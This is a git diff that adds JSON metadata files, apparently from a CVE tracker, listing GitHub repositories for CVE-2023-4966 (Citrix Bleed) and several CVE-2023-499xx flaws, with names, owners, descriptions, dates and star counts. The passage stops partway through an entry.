+++ b/2023/CVE-2023-4966.json
@@ -0,0 +1,378 @@
+[
+ {
+ "id": 709418839,
+ "name": "CVE-2023-4966",
+ "full_name": "Chocapikk\/CVE-2023-4966",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-4966",
+ "description": "Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. ",
+ "fork": false,
+ "created_at": "2023-10-24T17:19:32Z",
+ "updated_at": "2024-06-21T00:11:39Z",
+ "pushed_at": "2023-10-26T14:16:05Z",
+ "stargazers_count": 62,
+ "watchers_count": 62,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "citrix",
+ "cve-2023-4966",
+ "exploit",
+ "exploitation",
+ "infosec",
+ "memory-leak",
+ "netscaler",
+ "network-security",
+ "open-source",
+ "pentesting",
+ "python",
+ "security",
+ "security-research",
+ "session-tokens",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 62,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 709624306,
+ "name": "citrix_cve-2023-4966",
+ "full_name": "dinosn\/citrix_cve-2023-4966",
+ "owner": {
+ "login": "dinosn",
+ "id": 3851678,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3851678?v=4",
+ "html_url": "https:\/\/github.com\/dinosn"
+ },
+ "html_url": "https:\/\/github.com\/dinosn\/citrix_cve-2023-4966",
+ "description": "Citrix CVE-2023-4966 from assetnote modified for parallel and file handling",
+ "fork": false,
+ "created_at": "2023-10-25T04:15:17Z",
+ "updated_at": "2024-06-21T00:11:39Z",
+ "pushed_at": "2023-10-25T04:30:14Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 709678513,
+ "name": "Netscaler-CVE-2023-4966-POC",
+ "full_name": "senpaisamp\/Netscaler-CVE-2023-4966-POC",
+ "owner": {
+ "login": "senpaisamp",
+ "id": 98622787,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98622787?v=4",
+ "html_url": "https:\/\/github.com\/senpaisamp"
+ },
+ "html_url": "https:\/\/github.com\/senpaisamp\/Netscaler-CVE-2023-4966-POC",
+ "description": "Proof Of Concept for te NetScaler Vuln",
+ "fork": false,
+ "created_at": "2023-10-25T07:17:54Z",
+ "updated_at": "2024-04-23T10:50:27Z",
+ "pushed_at": "2024-04-23T10:50:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 709803873,
+ "name": "CVE-2023-4966-POC",
+ "full_name": "mlynchcogent\/CVE-2023-4966-POC",
+ "owner": {
+ "login": "mlynchcogent",
+ "id": 28465939,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28465939?v=4",
+ "html_url": "https:\/\/github.com\/mlynchcogent"
+ },
+ "html_url": "https:\/\/github.com\/mlynchcogent\/CVE-2023-4966-POC",
+ "description": "Proof Of Concept for te NetScaler Vuln",
+ "fork": false,
+ "created_at": "2023-10-25T12:37:56Z",
+ "updated_at": "2024-03-25T08:59:25Z",
+ "pushed_at": "2023-10-25T08:29:35Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 710028645,
+ "name": "CVE-2023-4966",
+ "full_name": "IceBreakerCode\/CVE-2023-4966",
+ "owner": {
+ "login": "IceBreakerCode",
+ "id": 129914557,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129914557?v=4",
+ "html_url": "https:\/\/github.com\/IceBreakerCode"
+ },
+ "html_url": "https:\/\/github.com\/IceBreakerCode\/CVE-2023-4966",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-25T21:34:43Z",
+ "updated_at": "2023-10-25T21:36:05Z",
+ "pushed_at": "2023-10-25T21:35:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 710747980,
+ "name": "CVE-2023-4966",
+ "full_name": "0xKayala\/CVE-2023-4966",
+ "owner": {
+ "login": "0xKayala",
+ "id": 16838353,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16838353?v=4",
+ "html_url": "https:\/\/github.com\/0xKayala"
+ },
+ "html_url": "https:\/\/github.com\/0xKayala\/CVE-2023-4966",
+ "description": "CVE-2023-4966 - NetScaler ADC and NetScaler Gateway Memory Leak Exploit",
+ "fork": false,
+ "created_at": "2023-10-27T11:00:09Z",
+ "updated_at": "2023-10-28T06:02:58Z",
+ "pushed_at": "2023-10-28T06:47:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 711157442,
+ "name": "citrix-logchecker",
+ "full_name": "certat\/citrix-logchecker",
+ "owner": {
+ "login": "certat",
+ "id": 14126796,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14126796?v=4",
+ "html_url": "https:\/\/github.com\/certat"
+ },
+ "html_url": "https:\/\/github.com\/certat\/citrix-logchecker",
+ "description": "Parse citrix netscaler logs to check for signs of CVE-2023-4966 exploitation",
+ "fork": false,
+ "created_at": "2023-10-28T11:44:42Z",
+ "updated_at": "2024-01-09T18:45:51Z",
+ "pushed_at": "2023-11-03T17:09:05Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 711541796,
+ "name": "CVE-2023-4966",
+ "full_name": "RevoltSecurities\/CVE-2023-4966",
+ "owner": {
+ "login": "RevoltSecurities",
+ "id": 119435129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4",
+ "html_url": "https:\/\/github.com\/RevoltSecurities"
+ },
+ "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2023-4966",
+ "description": "An Exploitation script developed to exploit the CVE-2023-4966 bleed citrix information disclosure vulnerability",
+ "fork": false,
+ "created_at": "2023-10-29T15:31:37Z",
+ "updated_at": "2024-03-21T17:55:02Z",
+ "pushed_at": "2023-10-29T17:43:05Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 721262627,
+ "name": "CVE-2023-4966",
+ "full_name": "s-bt\/CVE-2023-4966",
+ "owner": {
+ "login": "s-bt",
+ "id": 48731760,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48731760?v=4",
+ "html_url": "https:\/\/github.com\/s-bt"
+ },
+ "html_url": "https:\/\/github.com\/s-bt\/CVE-2023-4966",
+ "description": "Scripts to get infos",
+ "fork": false,
+ "created_at": "2023-11-20T17:32:16Z",
+ "updated_at": "2023-11-20T17:36:18Z",
+ "pushed_at": "2023-11-20T17:41:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 724052502,
+ "name": "CVE-2023-4966",
+ "full_name": "byte4RR4Y\/CVE-2023-4966",
+ "owner": {
+ "login": "byte4RR4Y",
+ "id": 121404035,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121404035?v=4",
+ "html_url": "https:\/\/github.com\/byte4RR4Y"
+ },
+ "html_url": "https:\/\/github.com\/byte4RR4Y\/CVE-2023-4966",
+ "description": "Programm to exploit a range of ip adresses",
+ "fork": false,
+ "created_at": "2023-11-27T09:51:30Z",
+ "updated_at": "2023-11-27T09:52:07Z",
+ "pushed_at": "2023-11-27T10:04:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 729065658,
+ "name": "cve-2023-4966-iocs",
+ "full_name": "jmussmann\/cve-2023-4966-iocs",
+ "owner": {
+ "login": "jmussmann",
+ "id": 24474138,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24474138?v=4",
+ "html_url": "https:\/\/github.com\/jmussmann"
+ },
+ "html_url": "https:\/\/github.com\/jmussmann\/cve-2023-4966-iocs",
+ "description": "Python script to search Citrix NetScaler logs for possible CVE-2023-4966 exploitation.",
+ "fork": false,
+ "created_at": "2023-12-08T10:28:15Z",
+ "updated_at": "2023-12-08T10:34:06Z",
+ "pushed_at": "2023-12-09T12:55:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 732499705,
+ "name": "overread",
+ "full_name": "morganwdavis\/overread",
+ "owner": {
+ "login": "morganwdavis",
+ "id": 4434533,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4434533?v=4",
+ "html_url": "https:\/\/github.com\/morganwdavis"
+ },
+ "html_url": "https:\/\/github.com\/morganwdavis\/overread",
+ "description": "Simulates CVE-2023-4966 Citrix Bleed overread bug",
+ "fork": false,
+ "created_at": "2023-12-16T21:55:04Z",
+ "updated_at": "2024-04-22T12:46:33Z",
+ "pushed_at": "2023-12-31T10:40:08Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49950.json b/2023/CVE-2023-49950.json
new file mode 100644
index 0000000000..7a5a6708f4
--- /dev/null
+++ b/2023/CVE-2023-49950.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 750788126,
+ "name": "cve-2023-49950",
+ "full_name": "shrikeinfosec\/cve-2023-49950",
+ "owner": {
+ "login": "shrikeinfosec",
+ "id": 107105450,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107105450?v=4",
+ "html_url": "https:\/\/github.com\/shrikeinfosec"
+ },
+ "html_url": "https:\/\/github.com\/shrikeinfosec\/cve-2023-49950",
+ "description": "A write-up detailing CVE-2023-49950. Affects Logpoint SIEM v6.1.0-v7.3.0",
+ "fork": false,
+ "created_at": "2024-01-31T10:18:12Z",
+ "updated_at": "2024-01-31T12:04:55Z",
+ "pushed_at": "2024-01-31T12:10:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49954.json b/2023/CVE-2023-49954.json
new file mode 100644
index 0000000000..128f757410
--- /dev/null
+++ b/2023/CVE-2023-49954.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 731730712,
+ "name": "CVE-2023-49954.github.io",
+ "full_name": "CVE-2023-49954\/CVE-2023-49954.github.io",
+ "owner": {
+ "login": "CVE-2023-49954",
+ "id": 153858003,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153858003?v=4",
+ "html_url": "https:\/\/github.com\/CVE-2023-49954"
+ },
+ "html_url": "https:\/\/github.com\/CVE-2023-49954\/CVE-2023-49954.github.io",
+ "description": "SQL Injection in 3CX CRM Integration",
+ "fork": false,
+ "created_at": "2023-12-14T18:38:28Z",
+ "updated_at": "2023-12-19T21:05:59Z",
+ "pushed_at": "2023-12-18T07:00:52Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49964.json b/2023/CVE-2023-49964.json
new file mode 100644
index 0000000000..b99f974553
--- /dev/null
+++ b/2023/CVE-2023-49964.json
@@ -0,0 +1,42 @@
+[
+ {
+ "id": 729296630,
+ "name": "CVE-2023-49964",
+ "full_name": "mbadanoiu\/CVE-2023-49964",
+ "owner": {
+ "login": "mbadanoiu",
+ "id": 18383407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4",
+ "html_url": "https:\/\/github.com\/mbadanoiu"
+ },
+ "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2023-49964",
+ "description": "CVE-2023-49964: FreeMarker Server-Side Template Injection in Alfresco",
+ "fork": false,
+ "created_at": "2023-12-08T20:47:52Z",
+ "updated_at": "2024-05-02T14:18:57Z",
+ "pushed_at": "2023-12-09T10:54:03Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "authenticated",
+ "bypass",
+ "cve",
+ "cve-2020-12873",
+ "cve-2023-49964",
+ "cves",
+ "remote-code-execution",
+ "server-side-template-injection"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49965.json b/2023/CVE-2023-49965.json
new file mode 100644
index 0000000000..d5c76709be
--- /dev/null
+++ b/2023/CVE-2023-49965.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 744283985,
+ "name": "SpaceX-Starlink-Router-Gen-2-XSS",
+ "full_name": "hackintoanetwork\/SpaceX-Starlink-Router-Gen-2-XSS",
+ "owner": {
+ "login": "hackintoanetwork",
+ "id": 83481196,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83481196?v=4",
+ "html_url": "https:\/\/github.com\/hackintoanetwork"
+ },
+ "html_url": "https:\/\/github.com\/hackintoanetwork\/SpaceX-Starlink-Router-Gen-2-XSS",
+ "description": "CVE-2023-49965 | SpaceX \/ Starlink Router Gen 2 XSS ",
+ "fork": false,
+ "created_at": "2024-01-17T01:24:15Z",
+ "updated_at": "2024-06-25T11:50:00Z",
+ "pushed_at": "2024-04-10T16:39:42Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49968.json b/2023/CVE-2023-49968.json
new file mode 100644
index 0000000000..f24da4f45d
--- /dev/null
+++ b/2023/CVE-2023-49968.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733689714,
+ "name": "CVE-2023-49968",
+ "full_name": "geraldoalcantara\/CVE-2023-49968",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49968",
+ "description": "Customer Support System 1.0 - SQL Injection Vulnerability in manage_department.php via \"id\" URL Parameter",
+ "fork": false,
+ "created_at": "2023-12-19T22:45:22Z",
+ "updated_at": "2023-12-20T09:48:23Z",
+ "pushed_at": "2023-12-20T08:30:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49969.json b/2023/CVE-2023-49969.json
new file mode 100644
index 0000000000..362d98cb74
--- /dev/null
+++ b/2023/CVE-2023-49969.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733693627,
+ "name": "CVE-2023-49969",
+ "full_name": "geraldoalcantara\/CVE-2023-49969",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49969",
+ "description": "Customer Support System 1.0 - SQL Injection Vulnerability in edit_customer via \"id\" URL Parameter",
+ "fork": false,
+ "created_at": "2023-12-19T23:02:09Z",
+ "updated_at": "2023-12-20T09:49:01Z",
+ "pushed_at": "2023-12-20T08:32:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49970.json b/2023/CVE-2023-49970.json
new file mode 100644
index 0000000000..773ea64769
--- /dev/null
+++ b/2023/CVE-2023-49970.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733695939,
+ "name": "CVE-2023-49970",
+ "full_name": "geraldoalcantara\/CVE-2023-49970",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49970",
+ "description": "Customer Support System 1.0 - SQL Injection Vulnerability in the \"subject\" Parameter During \"save_ticket\" Operation",
+ "fork": false,
+ "created_at": "2023-12-19T23:12:29Z",
+ "updated_at": "2023-12-20T09:49:52Z",
+ "pushed_at": "2023-12-20T08:34:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49971.json b/2023/CVE-2023-49971.json
new file mode 100644
index 0000000000..db228f28f5
--- /dev/null
+++ b/2023/CVE-2023-49971.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733716638,
+ "name": "CVE-2023-49971",
+ "full_name": "geraldoalcantara\/CVE-2023-49971",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49971",
+ "description": "Customer Support System 1.0 - (XSS) Cross-Site Scripting Vulnerability in the \"firstname\" parameter at \"customer_list",
+ "fork": false,
+ "created_at": "2023-12-20T00:55:22Z",
+ "updated_at": "2023-12-20T09:50:27Z",
+ "pushed_at": "2023-12-20T08:42:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49973.json b/2023/CVE-2023-49973.json
new file mode 100644
index 0000000000..83125a7196
--- /dev/null
+++ b/2023/CVE-2023-49973.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733723468,
+ "name": "CVE-2023-49973",
+ "full_name": "geraldoalcantara\/CVE-2023-49973",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49973",
+ "description": "Customer Support System 1.0 - Cross-Site Scripting (XSS) Vulnerability in \"email\" field\/parameter on \"customer_list\" Page",
+ "fork": false,
+ "created_at": "2023-12-20T01:26:22Z",
+ "updated_at": "2023-12-20T09:51:00Z",
+ "pushed_at": "2023-12-20T08:48:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49974.json b/2023/CVE-2023-49974.json
new file mode 100644
index 0000000000..7cea7da0af
--- /dev/null
+++ b/2023/CVE-2023-49974.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733724496,
+ "name": "CVE-2023-49974",
+ "full_name": "geraldoalcantara\/CVE-2023-49974",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49974",
+ "description": "Customer Support System 1.0 - Cross-Site Scripting (XSS) Vulnerability in \"contact\" field\/parameter on \"customer_list\" Page",
+ "fork": false,
+ "created_at": "2023-12-20T01:31:08Z",
+ "updated_at": "2023-12-20T09:51:39Z",
+ "pushed_at": "2023-12-20T01:34:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49976.json b/2023/CVE-2023-49976.json
new file mode 100644
index 0000000000..029b2ac5f7
--- /dev/null
+++ b/2023/CVE-2023-49976.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 724641524,
+ "name": "CVE-2023-49976",
+ "full_name": "geraldoalcantara\/CVE-2023-49976",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49976",
+ "description": " Customer Support System 1.0 is vulnerable to stored XSS. A XSS vulnerability exists in version 1 of the Customer Support System. A malicious actor can insert JavaScript code through the \"subject\" field when editing\/creating a ticket. ",
+ "fork": false,
+ "created_at": "2023-11-28T13:53:45Z",
+ "updated_at": "2023-12-20T09:52:28Z",
+ "pushed_at": "2023-12-20T01:05:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49977.json b/2023/CVE-2023-49977.json
new file mode 100644
index 0000000000..d99f6e95ca
--- /dev/null
+++ b/2023/CVE-2023-49977.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733727150,
+ "name": "CVE-2023-49977",
+ "full_name": "geraldoalcantara\/CVE-2023-49977",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49977",
+ "description": "Customer Support System 1.0 - Cross-Site Scripting (XSS) Vulnerability in \"Address\" field\/parameter on \"customer_list\" Page",
+ "fork": false,
+ "created_at": "2023-12-20T01:43:06Z",
+ "updated_at": "2023-12-20T09:53:04Z",
+ "pushed_at": "2023-12-20T01:49:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49978.json b/2023/CVE-2023-49978.json
new file mode 100644
index 0000000000..07db8ecfc4
--- /dev/null
+++ b/2023/CVE-2023-49978.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733728970,
+ "name": "CVE-2023-49978",
+ "full_name": "geraldoalcantara\/CVE-2023-49978",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49978",
+ "description": "Customer Support System 1.0 - Incorrect Access Control",
+ "fork": false,
+ "created_at": "2023-12-20T01:51:28Z",
+ "updated_at": "2023-12-20T09:53:46Z",
+ "pushed_at": "2023-12-20T02:04:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49979.json b/2023/CVE-2023-49979.json
new file mode 100644
index 0000000000..7efe4d0eb0
--- /dev/null
+++ b/2023/CVE-2023-49979.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733745008,
+ "name": "CVE-2023-49979",
+ "full_name": "geraldoalcantara\/CVE-2023-49979",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49979",
+ "description": "Best Student Management System v1.0 - Incorrect Access Control - Directory Listing",
+ "fork": false,
+ "created_at": "2023-12-20T03:01:53Z",
+ "updated_at": "2023-12-20T09:54:36Z",
+ "pushed_at": "2023-12-20T03:22:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49980.json b/2023/CVE-2023-49980.json
new file mode 100644
index 0000000000..551bb0d026
--- /dev/null
+++ b/2023/CVE-2023-49980.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 724635472,
+ "name": "CVE-2023-49980",
